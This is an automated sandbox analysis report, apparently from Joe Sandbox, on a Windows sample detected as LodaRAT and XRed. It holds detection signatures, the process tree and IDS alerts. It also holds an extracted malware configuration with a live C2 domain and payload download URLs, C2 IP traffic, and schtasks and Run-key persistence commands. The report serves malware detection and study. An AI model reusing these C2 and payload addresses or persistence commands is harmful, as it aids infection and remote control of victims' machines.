Windows Analysis Report
AYRASY.exe

Overview

General Information

Sample name: AYRASY.exe
Analysis ID: 1582334
MD5: 07e25c260c13b82cd867daef02255c82
SHA1: ebc6562d3eb2a877d8cfeafcada1e1af1a66e208
SHA256: 72d043dcd766da3f32477c3c1612165b2124f347013bbb69ba3da85eaf9e3d40
Tags: exeknkbkk212user-JAMESWT_MHT

Detection

LodaRAT, XRed
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LodaRAT
Yara detected XRed
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with functions possibly related to ADO stream file operations
Document contains an embedded VBA with functions possibly related to HTTP operations
Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)
Drops PE files to the document folder of the user
Found API chain indicative of sandbox detection
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Potentially Suspicious Malware Callback Communication
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Uses dynamic DNS services
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query the security center for anti-virus and firewall products
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
One or more processes crash
PE file contains executable resources (Code or Archives)
Potential key logger detected (key state polling based)
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Sleep loop found (likely to delay execution)
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara detected ProcessChecker

Classification

  • System is w10x64
  • AYRASY.exe (PID: 6600 cmdline: "C:\Users\user\Desktop\AYRASY.exe" MD5: 07E25C260C13B82CD867DAEF02255C82)
    • ._cache_AYRASY.exe (PID: 6564 cmdline: "C:\Users\user\Desktop\._cache_AYRASY.exe" MD5: 8E44132C27ADC94100C8D8BE5D4AD041)
      • cmd.exe (PID: 1916 cmdline: C:\Windows\system32\cmd.exe /c schtasks /create /tn WBHUSK.exe /tr C:\Users\user\AppData\Roaming\Windata\YOABSG.exe /sc minute /mo 1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 3556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • schtasks.exe (PID: 4328 cmdline: schtasks /create /tn WBHUSK.exe /tr C:\Users\user\AppData\Roaming\Windata\YOABSG.exe /sc minute /mo 1 MD5: 48C2FE20575769DE916F48EF0676A965)
      • wscript.exe (PID: 3460 cmdline: WSCript C:\Users\user\AppData\Local\Temp\WBHUSK.vbs MD5: FF00E0480075B095948000BDC66E81F0)
    • Synaptics.exe (PID: 5048 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate MD5: 27C056CC4DAFB6B3161272E800C85E55)
      • WerFault.exe (PID: 7888 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5048 -s 3548 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • EXCEL.EXE (PID: 3404 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: 4A871771235598812032C822E6F68F19)
  • YOABSG.exe (PID: 5672 cmdline: C:\Users\user\AppData\Roaming\Windata\YOABSG.exe MD5: 8E44132C27ADC94100C8D8BE5D4AD041)
  • YOABSG.exe (PID: 7208 cmdline: "C:\Users\user\AppData\Roaming\Windata\YOABSG.exe" MD5: 8E44132C27ADC94100C8D8BE5D4AD041)
  • Synaptics.exe (PID: 7704 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" MD5: 27C056CC4DAFB6B3161272E800C85E55)
  • YOABSG.exe (PID: 7956 cmdline: "C:\Users\user\AppData\Roaming\Windata\YOABSG.exe" MD5: 8E44132C27ADC94100C8D8BE5D4AD041)
  • YOABSG.exe (PID: 8104 cmdline: "C:\Users\user\AppData\Roaming\Windata\YOABSG.exe" MD5: 8E44132C27ADC94100C8D8BE5D4AD041)
  • YOABSG.exe (PID: 5804 cmdline: C:\Users\user\AppData\Roaming\Windata\YOABSG.exe MD5: 8E44132C27ADC94100C8D8BE5D4AD041)
  • YOABSG.exe (PID: 4092 cmdline: C:\Users\user\AppData\Roaming\Windata\YOABSG.exe MD5: 8E44132C27ADC94100C8D8BE5D4AD041)
  • cleanup
Name: Loda, LodaRAT
Description: Loda is a previously undocumented AutoIT malware with a variety of capabilities for spying on victims. Proofpoint first observed Loda in September of 2016 and it has since grown in popularity. The name Loda is derived from a directory to which the malware author chose to write keylogger logs. It should be noted that some antivirus products currently detect Loda as Trojan.Nymeria, although the connection is not well-documented.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.loda

Malware configuration (XRed):
{
  "C2 url": "xred.mooo.com",
  "Email": "xredline1@gmail.com",
  "Payload urls": [
    "http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978",
    "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download",
    "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1",
    "http://xred.site50.net/syn/SUpdate.ini",
    "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download",
    "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1",
    "http://xred.site50.net/syn/Synaptics.rar",
    "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download",
    "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1",
    "http://xred.site50.net/syn/SSLLibrary.dll"
  ]
}
Source | Rule | Description | Author
AYRASY.exe | JoeSecurity_XRed | Yara detected XRed | Joe Security
AYRASY.exe | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security

Source | Rule | Description | Author
dump.pcap | JoeSecurity_LodaRat_1 | Yara detected LodaRAT | Joe Security

Source | Rule | Description | Author
C:\Users\user\AppData\Local\Temp\WBHUSK.vbs | JoeSecurity_ProcessChecker | Yara detected ProcessChecker | Joe Security
C:\ProgramData\Synaptics\RCX4413.tmp | JoeSecurity_XRed | Yara detected XRed | Joe Security
C:\ProgramData\Synaptics\RCX4413.tmp | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security
C:\Users\user\Documents\GAOBCVIQIJ\~$cache1 | JoeSecurity_XRed | Yara detected XRed | Joe Security
C:\Users\user\Documents\GAOBCVIQIJ\~$cache1 | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security
(2 further entries not shown)

Source | Rule | Description | Author
00000007.00000002.3411280080.0000000002D20000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_ProcessChecker | Yara detected ProcessChecker | Joe Security
00000007.00000002.3411537097.0000000002D78000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_ProcessChecker | Yara detected ProcessChecker | Joe Security
00000007.00000002.3411537097.0000000002D97000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_ProcessChecker | Yara detected ProcessChecker | Joe Security
00000003.00000003.2300553454.0000000000750000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_XRed | Yara detected XRed | Joe Security
00000000.00000000.2139635258.0000000000401000.00000020.00000001.01000000.00000003.sdmp | JoeSecurity_XRed | Yara detected XRed | Joe Security
(6 further entries not shown)

Source | Rule | Description | Author
0.0.AYRASY.exe.400000.0.unpack | JoeSecurity_XRed | Yara detected XRed | Joe Security
0.0.AYRASY.exe.400000.0.unpack | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security

System Summary

Source: Network Connection | Author: Florian Roth (Nextron Systems) | Data: DestinationIp: 172.111.138.100, DestinationIsIpv6: false, DestinationPort: 5552, EventID: 3, Image: C:\Users\user\Desktop\._cache_AYRASY.exe, Initiated: true, ProcessId: 6564, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49759
Source: Process started | Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) | Data: Command: WSCript C:\Users\user\AppData\Local\Temp\WBHUSK.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\WBHUSK.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\._cache_AYRASY.exe" , ParentImage: C:\Users\user\Desktop\._cache_AYRASY.exe, ParentProcessId: 6564, ParentProcessName: ._cache_AYRASY.exe, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\WBHUSK.vbs, ProcessId: 3460, ProcessName: wscript.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton | Data: Command: WSCript C:\Users\user\AppData\Local\Temp\WBHUSK.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\WBHUSK.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\._cache_AYRASY.exe" , ParentImage: C:\Users\user\Desktop\._cache_AYRASY.exe, ParentProcessId: 6564, ParentProcessName: ._cache_AYRASY.exe, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\WBHUSK.vbs, ProcessId: 3460, ProcessName: wscript.exe
Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: WSCript C:\Users\user\AppData\Local\Temp\WBHUSK.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\WBHUSK.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\._cache_AYRASY.exe" , ParentImage: C:\Users\user\Desktop\._cache_AYRASY.exe, ParentProcessId: 6564, ParentProcessName: ._cache_AYRASY.exe, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\WBHUSK.vbs, ProcessId: 3460, ProcessName: wscript.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: "C:\Users\user\AppData\Roaming\Windata\YOABSG.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\._cache_AYRASY.exe, ProcessId: 6564, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WBHUSK
Source: File created | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) | Data: EventID: 11, Image: C:\Users\user\Desktop\._cache_AYRASY.exe, ProcessId: 6564, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WBHUSK.lnk
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: schtasks /create /tn WBHUSK.exe /tr C:\Users\user\AppData\Roaming\Windata\YOABSG.exe /sc minute /mo 1, CommandLine: schtasks /create /tn WBHUSK.exe /tr C:\Users\user\AppData\Roaming\Windata\YOABSG.exe /sc minute /mo 1, CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn WBHUSK.exe /tr C:\Users\user\AppData\Roaming\Windata\YOABSG.exe /sc minute /mo 1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1916, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /tn WBHUSK.exe /tr C:\Users\user\AppData\Roaming\Windata\YOABSG.exe /sc minute /mo 1, ProcessId: 4328, ProcessName: schtasks.exe
Source: Process started | Author: Michael Haag | Data: Command: WSCript C:\Users\user\AppData\Local\Temp\WBHUSK.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\WBHUSK.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\._cache_AYRASY.exe" , ParentImage: C:\Users\user\Desktop\._cache_AYRASY.exe, ParentProcessId: 6564, ParentProcessName: ._cache_AYRASY.exe, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\WBHUSK.vbs, ProcessId: 3460, ProcessName: wscript.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\ProgramData\Synaptics\Synaptics.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\AYRASY.exe, ProcessId: 6600, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver
Source: File created | Author: Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\ProgramData\Synaptics\Synaptics.exe, ProcessId: 5048, TargetFilename: C:\Users\user\AppData\Local\Temp\eLc9RiO7.xlsm
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-30T11:24:23.689476+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.6 | 49785 | 142.250.186.46 | 443 | TCP
2024-12-30T11:24:23.690792+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.6 | 49786 | 142.250.186.46 | 443 | TCP
2024-12-30T11:24:24.663897+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.6 | 49802 | 142.250.186.46 | 443 | TCP
2024-12-30T11:24:24.787303+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.6 | 49803 | 142.250.186.46 | 443 | TCP
2024-12-30T11:24:25.669103+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.6 | 49813 | 142.250.186.46 | 443 | TCP
2024-12-30T11:24:25.777972+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.6 | 49816 | 142.250.186.46 | 443 | TCP
2024-12-30T11:24:26.806878+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.6 | 49824 | 142.250.186.46 | 443 | TCP
2024-12-30T11:24:27.033307+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.6 | 49825 | 142.250.186.46 | 443 | TCP
2024-12-30T11:24:27.783272+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.6 | 49836 | 142.250.186.46 | 443 | TCP
2024-12-30T11:24:28.393374+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.6 | 49845 | 142.250.186.46 | 443 | TCP
2024-12-30T11:24:28.911174+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.6 | 49852 | 142.250.186.46 | 443 | TCP
2024-12-30T11:24:29.360483+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.6 | 49859 | 142.250.186.46 | 443 | TCP
2024-12-30T11:24:29.965830+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.6 | 49861 | 142.250.186.46 | 443 | TCP
2024-12-30T11:24:35.945263+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.6 | 49867 | 142.250.186.46 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-30T11:24:18.707018+0100 | 2822116 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49759 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:25:03.966257+0100 | 2822116 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50039 | 172.111.138.100 | 5552 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-30T11:25:18.107770+0100 | 2830912 | 1 | Malware Command and Control Activity Detected | 172.111.138.100 | 5552 | 192.168.2.6 | 50039 | TCP
2024-12-30T11:25:55.779991+0100 | 2830912 | 1 | Malware Command and Control Activity Detected | 172.111.138.100 | 5552 | 192.168.2.6 | 50039 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-30T11:24:24.009667+0100 | 2832617 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49796 | 69.42.215.252 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-30T11:24:01.975248+0100 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49979 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:24:01.975248+0100 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50039 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:24:01.975248+0100 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49850 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:24:01.975248+0100 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49923 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:24:01.975248+0100 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50037 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:24:01.975248+0100 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49759 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:24:18.707018+0100 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49759 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:24:27.777887+0100 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49850 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:24:36.793999+0100 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49923 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:24:45.810968+0100 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49979 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:24:54.840629+0100 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50037 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:25:03.966257+0100 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50039 | 172.111.138.100 | 5552 | TCP


AV Detection

Source: AYRASY.exe | Avira: detected
Source: http://xred.site50.net/syn/SUpdate.ini0. | Avira URL Cloud: Label: malware
Source: http://xred.site50.net/syn/SSLLibrary.dl8 | Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Temp\WBHUSK.vbs | Avira: detection malicious, Label: VBS/Runner.VPJI
Source: C:\ProgramData\Synaptics\RCX4413.tmp | Avira: detection malicious, Label: TR/Dldr.Agent.SH
Source: C:\ProgramData\Synaptics\RCX4413.tmp | Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
Source: C:\ProgramData\Synaptics\Synaptics.exe | Avira: detection malicious, Label: TR/Dldr.Agent.SH
Source: C:\ProgramData\Synaptics\Synaptics.exe | Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
Source: C:\Users\user\Documents\GAOBCVIQIJ\~$cache1 | Avira: detection malicious, Label: TR/Dldr.Agent.SH
Source: C:\Users\user\Documents\GAOBCVIQIJ\~$cache1 | Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
Source: AYRASY.exe | Malware Configuration Extractor: XRed {"C2 url": "xred.mooo.com", "Email": "xredline1@gmail.com", "Payload urls": ["http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download", "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1", "http://xred.site50.net/syn/SUpdate.ini", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download", "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1", "http://xred.site50.net/syn/Synaptics.rar", "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download", "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1", "http://xred.site50.net/syn/SSLLibrary.dll"]}
Source: C:\ProgramData\Synaptics\RCX4413.tmp | ReversingLabs: Detection: 100%
Source: C:\ProgramData\Synaptics\Synaptics.exe | ReversingLabs: Detection: 92%
Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exe | ReversingLabs: Detection: 47%
Source: C:\Users\user\Desktop\._cache_AYRASY.exe | ReversingLabs: Detection: 47%
Source: C:\Users\user\Documents\GAOBCVIQIJ\~$cache1 | ReversingLabs: Detection: 100%
Source: AYRASY.exe | ReversingLabs: Detection: 92%
Source: AYRASY.exe | Virustotal: Detection: 87%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 98.4% probability
Source: C:\Users\user\Desktop\._cache_AYRASY.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exe | Joe Sandbox ML: detected
Source: C:\ProgramData\Synaptics\RCX4413.tmp | Joe Sandbox ML: detected
Source: C:\ProgramData\Synaptics\Synaptics.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Documents\GAOBCVIQIJ\~$cache1 | Joe Sandbox ML: detected
Source: AYRASY.exe | Joe Sandbox ML: detected
Source: AYRASY.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll
Source: unknown | HTTPS traffic detected: 142.250.186.46:443 -> 192.168.2.6:49786 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 142.250.186.46:443 -> 192.168.2.6:49785 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.217.23.97:443 -> 192.168.2.6:49805 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.217.23.97:443 -> 192.168.2.6:49804 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 142.250.186.46:443 -> 192.168.2.6:49813 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 142.250.186.46:443 -> 192.168.2.6:49816 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 142.250.186.46:443 -> 192.168.2.6:49845 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 142.250.186.46:443 -> 192.168.2.6:49852 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.217.23.97:443 -> 192.168.2.6:49853 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.217.23.97:443 -> 192.168.2.6:49858 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 142.250.186.46:443 -> 192.168.2.6:49859 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 142.250.186.46:443 -> 192.168.2.6:49867 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 142.250.186.46:443 -> 192.168.2.6:49913 version: TLS 1.2
Source: AYRASY.exe, 00000000.00000000.2139635258.0000000000401000.00000020.00000001.01000000.00000003.sdmp | Binary or memory string: [autorun]
Source: AYRASY.exe, 00000000.00000000.2139635258.0000000000401000.00000020.00000001.01000000.00000003.sdmp | Binary or memory string: autorun.inf
Source: Synaptics.exe, 00000003.00000003.2300553454.0000000000750000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [autorun]
Source: Synaptics.exe, 00000003.00000003.2300553454.0000000000750000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: autorun.inf
Source: AYRASY.exe | Binary or memory string: [autorun]
Source: AYRASY.exe | Binary or memory string: autorun.inf
Source: C:\Users\user\Desktop\._cache_AYRASY.exe | Code function: 2_2_0018DD92 GetFileAttributesW,FindFirstFileW,FindClose,2_2_0018DD92
Source: C:\Users\user\Desktop\._cache_AYRASY.exe | Code function: 2_2_001C2044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_001C2044
Source: C:\Users\user\Desktop\._cache_AYRASY.exe | Code function: 2_2_001C219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_001C219F
Source: C:\Users\user\Desktop\._cache_AYRASY.exe | Code function: 2_2_001C24A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_001C24A9
Source: C:\Users\user\Desktop\._cache_AYRASY.exe | Code function: 2_2_001B6B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,2_2_001B6B3F
Source: C:\Users\user\Desktop\._cache_AYRASY.exe | Code function: 2_2_001B6E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,2_2_001B6E4A
Source: C:\Users\user\Desktop\._cache_AYRASY.exe | Code function: 2_2_001BF350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_001BF350
Source: C:\Users\user\Desktop\._cache_AYRASY.exe | Code function: 2_2_001BFD47 FindFirstFileW,FindClose,2_2_001BFD47
Source: C:\Users\user\Desktop\._cache_AYRASY.exe | Code function: 2_2_001BFDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,2_2_001BFDD2
Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exe | Code function: 9_2_00A02044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,9_2_00A02044
Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exe | Code function: 9_2_00A0219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,9_2_00A0219F
